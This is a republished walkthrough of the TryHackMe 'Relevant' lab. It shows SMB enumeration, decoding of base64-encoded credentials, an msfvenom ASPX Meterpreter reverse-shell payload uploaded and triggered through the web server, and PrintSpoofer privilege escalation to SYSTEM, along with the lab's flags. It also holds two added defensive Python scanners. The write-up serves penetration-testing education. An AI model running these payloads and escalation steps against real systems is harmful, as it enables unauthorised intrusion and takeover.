Relevant — TryHackMe Room Walkthrough
2025-10-30 09:1:26 Author: infosecwriteups.com (view original) Reads: 6

Death Esther


Introduction

We were hired to perform a seven‑day black‑box penetration test on a pre‑production environment (TryHackMe room: https://tryhackme.com/room/relevant). With only the target IP in scope, our main objectives were to locate and submit user.txt and root.txt as proof of compromise, while also identifying and documenting all vulnerabilities present. The engagement emphasized manual enumeration and exploitation before resorting to automated tools, though any tool was permitted and nothing in this room requires Metasploit.

We treated this exercise like a real client engagement: starting with reconnaissance and service discovery, followed by web and SMB enumeration, targeted exploitation, and post-exploitation privilege escalation. Each step was carefully documented with commands, screenshots, and proof, and we included remediation suggestions to help secure the environment prior to production. This structured approach not only ensured we captured all findings but also provided a clear workflow for anyone learning penetration testing or preparing for a professional assessment.

Initial Reconnaissance

I began with an aggressive nmap service/version scan to quickly discover open ports, service banners, and OS guesses.

nmap -sV -sC -A -Pn 10.201.45.153

nmap output:

PORT     STATE SERVICE       VERSION
80/tcp open http Microsoft IIS httpd 10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393
3389/tcp open ms-wbt-server Microsoft Terminal Services

What this told me

  • Port 80 is running Microsoft IIS 10.0 → likely a web application to enumerate.
  • SMB ports (139/445) are open — this often means shares or files are available to read if anonymous/guest is allowed.
  • RPC (135) and RDP (3389) are reachable — RDP could be an alternate attack vector, but I stuck to manual enumeration first.
  • nmap also revealed some useful service info like the machine name (Relevant) and an SSL certificate commonName Relevant.

Note: The scanner initially reported most other ports as filtered; later I discovered an additional high TCP port (49663) worth checking.

SMB enumeration

Because SMB was open, I listed the available shares using smbclient -L:

smbclient -L 10.201.45.153

This listed shares including ADMIN$, C$, IPC$ and an interesting named share nt4wrksv. I connected to the nt4wrksv share:

smbclient //10.201.45.153/nt4wrksv

Once connected, I listed files with ls and found a file called passwords.txt:

smb: \> ls
passwords.txt
smb: \> get passwords.txt

I downloaded passwords.txt and inspected it:

cat passwords.txt
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk

The file contained base64-encoded lines. I decoded them in the terminal using base64 -d:

echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d
# => Bob - !P@$$W0rD!123

echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d
# => Bill - Juw4nnaM4n420696969!$$$

Result: I recovered two credentials:

  • Bob — password: !P@$$W0rD!123
  • Bill — password: Juw4nnaM4n420696969!$$$
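The decoding step above, done by hand with base64 -d, can be turned into a small scanner that a defender can run over files pulled from exposed shares to spot exactly this kind of encoded credential list. This is an added example, not code from the original write-up; the file contents are a constructed copy of the passwords.txt layout shown above, and lines that are not valid base64 or do not decode to the "User - Password" layout are skipped rather than raising.

```python
import base64
import binascii
import re
from typing import List, Tuple

# Constructed copy of the share's passwords.txt, embedded so the scan runs offline.
# The third line is deliberately not base64 to exercise the skip path.
SAMPLE_FILE = """[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
not-base64-at-all!!
"""

# Strict base64 alphabet with optional padding; anything else is ignored up front.
B64_LINE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def decode_credential_lines(text: str) -> List[Tuple[str, str]]:
    """Return (user, password) pairs for every line that base64-decodes
    to printable text in the 'User - Password' layout seen on the share.

    Invalid base64, non-text payloads and lines with a different layout
    are skipped, so the function can be run over arbitrary share contents.
    """
    found: List[Tuple[str, str]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or not B64_LINE.match(line):
            continue
        try:
            decoded = base64.b64decode(line, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # bad padding, wrong length or binary payload
        if not decoded.isprintable():
            continue
        user, sep, password = decoded.partition(" - ")
        if sep and user and password:
            found.append((user, password))
    return found


if __name__ == "__main__":
    for user, password in decode_credential_lines(SAMPLE_FILE):
        print(f"credential found for {user}: {'*' * len(password)}")
```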


Web enumeration

With port 80 open I checked the web server first, but a quick manual look and directory enumeration on :80 didn’t reveal anything useful.


I then fuzzed the suspicious high port 49663 where I’d noticed a service earlier.

Directory brute-force

dirsearch -u http://<ip>:49663 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Result:

[11:00:28] 301 -  159B  - /nt4wrksv  ->  http://10.201.48.253:49663/nt4wrksv/

This confirmed /nt4wrksv is a web-accessible directory (and matches the SMB share name).


Exploitation approach (why ASPX)

The directory accepted .aspx pages (ASP.NET), so I generated a Windows ASPX reverse Meterpreter payload. I used msfvenom and set LHOST to my attacking machine IP (shown as xx.xx.xx.xx in the command below; in my case it was 10.17.30.120, so substitute your own Kali IP) and an arbitrary LPORT:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=1234 -f aspx > exploit.aspx

I uploaded the generated exploit.aspx to the SMB share (same nt4wrksv share) using smbclient:

smbclient //10.201.45.153/nt4wrksv
# (press Enter for anonymous if prompted)
smb: \> put exploit.aspx
smb: \> exit

Start the handler and trigger the payload

I started Metasploit’s handler to catch the Meterpreter session:

msfconsole -q
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <your-IP>
set LPORT 1234
run

Then I triggered the uploaded ASPX by requesting it (browser or curl):

curl http://10.201.45.153:49663/nt4wrksv/exploit.aspx

Shortly after, the handler returned a Meterpreter session.

Capturing the user flag

Inside the Meterpreter session I navigated to Bob’s Desktop and read user.txt:

meterpreter > cat "c:\\Users\\Bob\\Desktop\\user.txt"
THM{fdk4ka34vk346ksxfr21tg789ktf45}

Note: the TryHackMe lab expired during my testing and I restarted the lab, so the target/attacker IPs changed; ignore the differences in IPs between screenshots and commands.

Post‑exploitation

After capturing the user flag, I checked my privileges inside the Meterpreter session to look for escalation opportunities:

meterpreter > getuid
Server username: IIS APPPOOL\DefaultAppPool
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege

meterpreter >

SeImpersonatePrivilege stood out — it allows a process to impersonate another user and is commonly abused to get SYSTEM. A widely used tool for this on Windows is PrintSpoofer (author: itm4n), which leverages that privilege to spawn a SYSTEM shell.
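From the defender's side, the getprivs output above is the artifact to audit: a web application pool account holding token-related privileges is a least-privilege finding regardless of which tool later abuses it. The following is an added example, not code from the original write-up; it parses getprivs or whoami /priv style output (constructed here from the listing above) and flags the privileges that allow using another account's token. The flag list goes slightly beyond the page by also including SeDebugPrivilege, which is not present on this target.

```python
import re
from typing import Dict, List

# Constructed copy of the Meterpreter getprivs listing shown above, used as offline input.
SAMPLE_GETPRIVS = """
Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
"""

# Privileges that let a process obtain or use another account's token. An IIS
# application pool has no business holding them, so each one is a finding.
TOKEN_PRIVILEGES: Dict[str, str] = {
    "SeImpersonatePrivilege": "process may impersonate any token it obtains",
    "SeAssignPrimaryTokenPrivilege": "process may assign a primary token to a child",
    "SeDebugPrivilege": "process may open any process and take its token",
}

# Matches the privilege name at the start of a line. This also works for
# whoami /priv, where the description and Enabled/Disabled state follow the name.
# A held-but-disabled privilege can be re-enabled by the process, so state is ignored.
PRIV_LINE = re.compile(r"^\s*(Se[A-Za-z]+Privilege)\b")


def parse_privileges(output: str) -> List[str]:
    """Extract every privilege name from getprivs / whoami /priv output, in order."""
    names: List[str] = []
    for line in output.splitlines():
        m = PRIV_LINE.match(line)
        if m:
            names.append(m.group(1))
    return names


def audit_service_account(output: str) -> List[str]:
    """Return one finding per token-related privilege held; empty list if clean."""
    findings: List[str] = []
    for name in parse_privileges(output):
        reason = TOKEN_PRIVILEGES.get(name)
        if reason:
            findings.append(f"{name}: {reason}")
    return findings


if __name__ == "__main__":
    for finding in audit_service_account(SAMPLE_GETPRIVS):
        print("FINDING", finding)
```

Run the same function over whoami /priv output collected from each service account during a pre-production review; an empty list is the expected result for a web application pool.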

Privilege‑Escalation binary

I downloaded the PrintSpoofer binary to my attacking machine and uploaded it to the writable nt4wrksv share:

wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
smbclient //10.201.45.153/nt4wrksv
smb: \> put PrintSpoofer64.exe
smb: \> exit

Spawn an interactive shell and run PrintSpoofer

From Meterpreter I dropped to a Windows shell and navigated to the web directory where I uploaded the binary:

meterpreter > shell
c:\> cd c:\inetpub\wwwroot\nt4wrksv
c:\inetpub\wwwroot\nt4wrksv> dir
# shows exploit.aspx, passwords.txt, PrintSpoofer64.exe

I executed PrintSpoofer to spawn a SYSTEM process (it spawns powershell.exe as SYSTEM in this example):

PrintSpoofer64.exe -i -c powershell.exe

Capture the root flag

With SYSTEM privileges I navigated to the Administrator Desktop and read the final flag:

PS C:\Windows\system32> cat C:\Users\Administrator\Desktop\root.txt
THM{1fk5kf469devly1gl320zafgl345pv}

Conclusion

I exploited exposed SMB and IIS services to recover credentials, gained a Meterpreter shell, and escalated to SYSTEM with PrintSpoofer to capture user.txt and root.txt. This lab highlights the dangers of exposed shares and excessive privileges—practice manual enumeration and least‑privilege remediation.



Article source: https://infosecwriteups.com/relevant-tryhackme-room-walkthrough-0231c85c90ae?source=rss----7b722bfd1b8d---4